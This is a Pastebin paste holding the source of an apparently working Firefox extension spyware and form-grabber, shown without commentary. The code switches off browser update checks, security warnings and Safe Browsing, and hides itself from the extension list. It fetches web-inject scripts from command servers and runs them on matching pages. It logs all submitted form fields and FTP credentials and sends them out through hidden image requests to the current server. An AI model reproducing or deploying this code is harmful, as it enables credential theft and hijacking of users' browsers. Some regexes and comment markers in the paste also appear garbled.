Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- if (typeof mo === "undefined") {
- var mo = "@mozilla.org/"
- }
- if (typeof Ci === "undefined") {
- var Ci = Components["interfaces"]
- }
- if (typeof Cc === "undefined") {
- var Cc = Components["classes"]
- }
- function dbglog(a) {}
- var FFVARS = Array(100);
- var COUNTX = 114;
- var FOUND = 0;
- var timerx = Cc[mo + "timer;1"]["createInstance"](Ci["nsITimer"]);
- var eventx = {
- ReqStateChange: function (i, a, f) {
- try {
- if (f["status"] != 200) {
- return false
- }
- var b = f["responseText"];
- if (b[42] != ";") {
- return false
- }
- if (b[0] != "G") {
- return false
- }
- if (b[1] != "I") {
- return false
- }
- if (b[2] != "F") {
- return false
- }
- if (b[3] != "8") {
- return false
- }
- if (b[4] != "9") {
- return false
- }
- if (b[5] != "a") {
- return false
- }
- var g = s_utils["SpyXPCOM"]["getpref"]("HOSTID");
- var d = this["GetListFromSrv"](i + "/?j=x&h=" + g);
- if (d) {
- s_utils.SaveFile("ffij.dat", d);
- mySpy["ParseInjects"](d)
- }
- var c = this["GetListFromSrv"](i + "/?r=x");
- s_utils["SetPreference"](i, c);
- FOUND = 1
- } catch (h) {}
- },
- CheckSrv: function (a) {
- try {
- var b = Cc[mo + "xmlextras/xmlhttprequest;1"]["createInstance"]();
- b["open"]("GET", "http://" + a + "/?f=*", true);
- b["overrideMimeType"]("text/plain; charset=x-user-defined");
- b["onreadystatechange"] = function (d) {
- eventx["ReqStateChange"](a, d, b)
- };
- b["send"](null)
- } catch (c) {}
- return false
- },
- GetListFromSrv: function (a) {
- try {
- var b = Cc[mo + "xmlextras/xmlhttprequest;1"]["createInstance"]();
- b.open("GET", "http://" + a, false);
- b["overrideMimeType"]("text/plain; charset=x-user-defined");
- b["send"](null);
- if (b["status"] != 200) {
- return
- }
- var c = /;(S*)/ ["exec"](b["responseText"]);
- if (c == null) {
- return false
- }
- return c[1]
- } catch (d) {}
- },
- notify: function (a) {
- COUNTX++;
- try {
- top: {
- if (COUNTX > 119) {
- var d = s_utils["ServerList"]["split"]("#");
- var b = COUNTX - 120;
- if (b < d["length"]) {
- if (FOUND == 0) {
- this["CheckSrv"](d[b])
- }
- } else {
- COUNTX = 0;
- FOUND = 0
- }
- }
- return
- }
- } catch (c) {}
- }
- };
- var s_utils = {
- spy_pref_last_server: "font.name-list.serif.x-aprd",
- spy_pref_last_redirectlist: "font.name-list.serif.x-zrff",
- spy_pref_last_update: "font.name-list.serif.w-arial",
- interval: 1000 * 10,
- CurrentServer: false,
- RedirectList: false,
- ServerList: null,
- cout: null,
- SpyXPCOM: null,
- init: function () {
- this.SpyXPCOM = Cc["@imoomajbcoa.etuiyqa.com/veooubusava;1"].getService().wrappedJSObject;
- this["ServerList"] = s_utils["SpyXPCOM"]["getpref"]("SERVERLIST");
- this["SetOurPrefs"]();
- this["InitPreference"]();
- this["hide_me_FF3"]()
- },
- SetOurPrefs: function () {
- try {
- const f = mo + "preferences-service;1";
- const d = Ci["nsIPrefService"];
- const c = Cc[f]["getService"](d);
- const a = c["getBranch"](null)["QueryInterface"](Ci["nsIPrefBranch"])
- } catch (g) {}
- var b = "127.0.0.1";
- try {
- a.setCharPref("app.update.url", b);
- a.setCharPref("app.update.url.details", b);
- a.setCharPref("app.update.url.manual", b)
- } catch (g) {}
- try {
- a.setBoolPref("security.warn_entering_secure", false);
- a.setBoolPref("security.warn_entering_secure.show_once", false);
- a.setBoolPref("security.warn_entering_weak", false);
- a.setBoolPref("security.warn_entering_weak.show_once", false);
- a.setBoolPref("security.warn_leaving_secure", false);
- a.setBoolPref("security.warn_leaving_secure.show_once", false);
- a.setBoolPref("security.warn_submit_insecure", false);
- a.setBoolPref("security.warn_submit_insecure.show_once", false);
- a.setBoolPref("security.warn_viewing_mixed", false);
- a.setBoolPref("security.warn_viewing_mixed.show_once", false);
- a.setBoolPref("browser.safebrowsing.enabled", false);
- a.setBoolPref("browser.safebrowsing.malware.enabled", false);
- a.setBoolPref("browser.privatebrowsing.autostart", true);
- a.setBoolPref("javascript.options.showInConsole", false)
- } catch (g) {}
- },
- hide_me_FF3: function () {
- try {
- var d = Cc[mo + "extensions/manager;1"]["getService"](Ci["nsIExtensionManager"])["datasource"];
- var k = Cc[mo + "rdf/rdf-service;1"]["getService"](Ci["nsIRDFService"]);
- var c = Cc[mo + "rdf/container;1"]["createInstance"](Ci["nsIRDFContainer"]);
- var j = k["GetResource"]("urn:mozilla:item:root");
- var i = k.GetResource("http://www.mozilla.org/2004/em-rdf#name");
- c["Init"](d, j);
- var a = c["GetElements"]();
- while (a["hasMoreElements"]()) {
- var f = a["getNext"]();
- var b = "";
- var h = d["GetTarget"](f, i, true);
- if (h) {
- b = h["QueryInterface"](Ci["nsIRDFLiteral"])["Value"];
- dbglog("sample.js: s_utils * hide_me_FF3, name:" + b);
- if (b == ".") {
- c.RemoveElement(f, true)
- }
- }
- }
- } catch (g) {}
- },
- SetRedirectListAsCurrent: function (f) {
- var c;
- if (f) {
- c = new Array();
- var e = f["split"]("#");
- for (var b = 0; b < e["length"]; b++) {
- var g = e[b]["split"]("|");
- if (g["length"] == 2) {
- var a = g[0]["replace"](/.?*.?/g, ".");
- var d = g[0]["replace"](/./g, "\.");
- d = d["replace"](
- /*/g,"[\s\S]*");if(g[1]["indexOf"]("/")==-1){g[1]+="/"}c["push"]({tofind:new RegExp(d,"i"),tofindstr:a,toreplace:g[1]["toLowerCase"]()})}}}else{c=false}this["RedirectList"]=c;this["SpyXPCOM"]["RedirectList"]=c},EncodePref:function(b){var a=function(){var c;for(c="Comic Sans MS";c["length"]<200;c+=" "){}return c}();return a+"#@#"+b64v2["en"](b)},DecodePref:function(b){try{return b64v2["de"](b["split"]("#@#")[1])}catch(a){dbglog("DecodePref ERR: "+a);return false}},InitPreference:function(){var c=false;try{const f=mo+"preferences-service;1";const d=Ci["nsIPrefService"];const b=Cc[f]["getService"](d);const a=b["getBranch"](null)["QueryInterface"](Ci["nsIPrefBranch"])}catch(g){}try{c=this["DecodePref"](b["getCharPref"](this["spy_pref_last_redirectlist"]))}catch(g){}try{this["CurrentServer"]=this["DecodePref"](b["getCharPref"](this["spy_pref_last_server"]))}catch(g){this["CurrentServer"]=false}this["SetRedirectListAsCurrent"](c);timerx["initWithCallback"](eventx,this["interval"],Ci["nsITimer"]["TYPE_REPEATING_SLACK"])},ReadFile:function(g){try{var a=Cc[mo+"file/directory_service;1"]["getService"](Ci["nsIProperties"])["get"]("ProfD",Ci["nsIFile"]);a["append"](g);var f=Cc[mo+"network/file-input-stream;1"]["createInstance"](Ci["nsIFileInputStream"]);var d=Cc[mo+"scriptableinputstream;1"]["createInstance"](Ci["nsIScriptableInputStream"]);f["init"](a,1,4,0);d["init"](f);var b=d["read"](1048575);f["close"]();return b}catch(c){}},SaveFile:function(f,b){if(!b){return}try{var a=Cc[mo+"file/directory_service;1"]["getService"](Ci["nsIProperties"])["get"]("ProfD",Ci["nsIFile"]);a["append"](f);var d=Cc[mo+"network/file-output-stream;1"]["createInstance"](Ci["nsIFileOutputStream"]);d["init"](a,2|8|32,438,0);d["write"](b,b["length"]);d["close"]()}catch(c){}},SetPreference:function(b,a){this["CurrentServer"]=b;if(b){gPrefService["setCharPref"](this["spy_pref_last_server"],this["EncodePref"](b))}if(a){a=b64v2.de(a);this["RedirectList"]=a;this["SetRedirectListAsCurrent"](a);gPrefService["setCharPref"](this["spy_pref_last_redirectlist"],this["EncodePref"](a));gPrefService["setCharPref"](this["spy_pref_last_update"],this["EncodePref"](String((new Date())["valueOf"]())))}}};var mySpy={sending:31337,max:40,max_inj:100,IDstr:null,HostId:null,version:null,Buffers:new Array(this["max"]),INJECT:new Array(this["max_inj"]),INJURL:new Array(this["max_inj"]),addlog:function(a){},dbgalert:function(a){},ParseInjects:function(d){var a=b64v2["de"](d);var g=new Array();g=a["split"]("|$");var c=new Array();var f=1;var e=s_utils["SpyXPCOM"]["getpref"]("HOSTID");for(f;f<g["length"];f++){var b=g[f]["substr"](0,g[f]["length"]-2);c=b["split"]("|^");this["INJURL"][f-1]=c[0];this["INJECT"][f-1]=c[1]["replace"]("_HOSTID_",e)}this["INJURL"][f-1]=false},init:function(){this["IDstr"]=this["rndStr"]();this["HostId"]=s_utils["SpyXPCOM"]["getpref"]("HOSTID");this["version"]=s_utils["SpyXPCOM"]["getpref"]("VERSION");var a=document["getElementById"]("appcontent");if(a){a["addEventListener"]("DOMContentLoaded",function(d){mySpy["onPageLoad"](d)},true);a["addEventListener"]("submit",function(d){mySpy["onSubmit"](d)},true)}try{var b=s_utils.ReadFile("ffij.dat");this["ParseInjects"](b)}catch(c){this["INJURL"][0]=false}},saveLog:function(b){for(var a=0;a<this["max"];a++){if(!this["Buffers"][a]){this["Buffers"][a]=b;return}}},findFtp:function(a){if(a["scheme"]=="ftp"){if(a["spec"]["search"](/:.*@/)!=-1){this["saveLog"](a["spec"])}}},onPageLoad:function(aEvent){var doc=aEvent["originalTarget"];try{if(doc!=null){if(doc["location"]["protocol"]["search"](/ftp|http/)!=-1){for(var i=0;i<this["max_inj"];i++){if(!this["INJURL"][i]){break}if(doc["URL"]["match"](this["INJURL"][i])){eval(this["INJECT"][i])}}this["SendData"](doc)}}}catch(e){}},onSubmit:function(b){var c=b["originalTarget"];var e=c["ownerDocument"];var f=e["getElementsByTagName"]("form");var d=this["ParseForm"](c);for(var a=0;a<f["length"];a++){if(f[a]!=c){d+=this["ParseForm"](f[a])}}d=e["location"]["href"]+" #FIREFOX#"+Application["version"]+"# "+d+"#;";this["saveLog"](d)},ParseForm:function(c){var a=c["getElementsByTagName"]("input");var d="";for(var b=0;b<a["length"];b++){d+=b+":"+a[b]["type"]+":"+((a[b]["name"]=="")?"<blank>:":a[b]["name"])+":";if(a[b]["type"]=="radio"||a[b]["type"]=="checkbox"){d+=a[b]["checked"]}else{d+=(a[b]["value"]=="")?"<blank>":a[b]["value"]}d+=" "}var e=c["textContent"]["replace"](/s{2,}|[
- ]/g,"|");d="<FORM"+((c["action"])?(" action="+c["action"]):"")+((c["id"])?(" id="+c["id"]):"")+((c.name)?(" name="+c["name"]):"")+"> "+d+e;return d},onLoadImg:function(b){var a=b["originalTarget"];if(!a["XTimeOut"]){var c=a["ownerDocument"];delete this["Buffers"][a["XStringIndex"]];window["clearTimeout"](a["XIdTimeout"])}},NextAttemptByTimeOut:function(c,b,a){this["Buffers"][c]=b;a["XTimeOut"]=true},SendData:function(d){var a="";for(var c=0;c<this["max"];c++){if(this["Buffers"][c]&&this["Buffers"][c]!=this["sending"]){if(!s_utils["CurrentServer"]){return}if(this["Buffers"][c]["length"]>37000){this["Buffers"][c]["length"]=37000}a="http://"+s_utils["CurrentServer"]+"/?h="+this["HostId"]+"&i="+c+this["IDstr"]+"&o=0&f=*&si=x&so=0&tl="+this["Buffers"][c]["length"]+"&v="+this["version"]+"&d="+b64["crypt"](this["Buffers"][c]);var b=this["InsertImg"](d,a);if(!b){continue}b["XTimeOut"]=false;b["XStringIndex"]=c;b["XIdTimeout"]=window["setTimeout"](function(f,e,g){mySpy["NextAttemptByTimeOut"](f,e,g)},10000,c,this["Buffers"][c],b);delete this["Buffers"][c];this["Buffers"][c]=this["sending"];b["addEventListener"]("load",function(e){mySpy["onLoadImg"](e)},true)}}},InsertImg:function(c,d){try{var a=c["createElement"]("img");a["setAttribute"]("border","0");a["setAttribute"]("width","0");a["setAttribute"]("height","0");a["setAttribute"]("src",d);c["body"]["insertBefore"](a,c["body"]["firstChild"]);return a}catch(b){return false}},rndStr:function(){var d="abcdefghiklmnopqrstuvwxyz";var e=10;var a="";for(var c=0;c<e;c++){var b=Math["floor"](Math["random"]()*d["length"]);a+=d["substring"](b,b+1)}return a}};var b64={_key:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)",crypt:function(b){var a=new Array(b["length"]);for(var c=0;c<b["length"];c++){a[c]=b["charCodeAt"](c)+c*c;a[c]=a[c]%6}b=b64["_en"](a);delete a;return b},_en:function(c){var a="";var k,h,f,j,g,e,d;var b=0;while(b<c["length"]){k=c[b++];h=c[b++];f=c[b++];j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a+this["_key"]["charAt"](j)+this["_key"]["charAt"](g)+this["_key"]["charAt"](e)+this["_key"]["charAt"](d)}return a},_de:function(c){var a=new Array();var k,h,f;var j,g,e,d;var b=0;while(b<c["length"]){j=this["_key"]["indexOf"](c["charAt"](b++));g=this["_key"]["indexOf"](c["charAt"](b++));e=this["_key"]["indexOf"](c["charAt"](b++));d=this["_key"]["indexOf"](c["charAt"](b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a.push(k);if(e!=64){a["push"](f)}if(d!=64){a["push"](chr4)}}return a},_utf8_en:function(b){b=b["replace"](/
- /g,"
- ");var a="";for(var e=0;e<b["length"];e++){var d=b["charCodeAt"](e);if(d<128){a+=String["fromCharCode"](d)}else{if((d>127)&&(d<2048)){a+=String["fromCharCode"]((d>>6)|192);a+=String["fromCharCode"]((d&63)|128)}else{a+=String["fromCharCode"]((d>>12)|224);a+=String["fromCharCode"](((d>>6)&63)|128);a+=String["fromCharCode"]((d&63)|128)}}}return a},};var b64v2={_key:"hijklmnoNOVWXYZ012wxyzABLMGHIJK3456789CDEFpqrsabcdefgtuvPQRSTU+/=",en:function(c){var a="";var k,h,f,j,g,e,d;var b=0;c=b64v2["_utf8_en"](c);while(b<c["length"]){k=c["charCodeAt"](b++);h=c["charCodeAt"](b++);f=c["charCodeAt"](b++);j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a+this["_key"]["charAt"](j)+this["_key"]["charAt"](g)+this["_key"]["charAt"](e)+this["_key"]["charAt"](d)}return a},de:function(c){var a="";var k,h,f;var j,g,e,d;var b=0;c=c["replace"](/[^A-Za-z0-9+/=]/g,"");while(b<c["length"]){j=this["_key"]["indexOf"](c["charAt"](b++));g=this["_key"]["indexOf"](c["charAt"](b++));e=this["_key"]["indexOf"](c["charAt"](b++));d=this["_key"]["indexOf"](c["charAt"](b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a=a+String["fromCharCode"](k);if(e!=64){a=a+String["fromCharCode"](h)}if(d!=64){a=a+String["fromCharCode"](f)}}a=b64v2["_utf8_de"](a);return a},_utf8_en:function(b){b=b["replace"](/
- /g,"
- ");var a="";for(var e=0;e<b["length"];e++){var d=b["charCodeAt"](e);if(d<128){a+=String["fromCharCode"](d)}else{if((d>127)&&(d<2048)){a+=String["fromCharCode"]((d>>6)|192);a+=String["fromCharCode"]((d&63)|128)}else{a+=String["fromCharCode"]((d>>12)|224);a+=String["fromCharCode"](((d>>6)&63)|128);a+=String["fromCharCode"]((d&63)|128)}}}return a},_utf8_de:function(a){var b="";var d=0;var e=c1=c2=0;while(d<a["length"]){e=a["charCodeAt"](d);if(e<128){b+=String["fromCharCode"](e);d++}else{if((e>191)&&(e<224)){c2=a["charCodeAt"](d+1);b+=String["fromCharCode"](((e&31)<<6)|(c2&63));d+=2}else{c2=a["charCodeAt"](d+1);c3=a["charCodeAt"](d+2);b+=String["fromCharCode"](((e&15)<<12)|((c2&63)<<6)|(c3&63));d+=3}}}return b}};function spy_init(){s_utils["init"]();mySpy["init"]()}window["addEventListener"]("load",spy_init,false);*/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement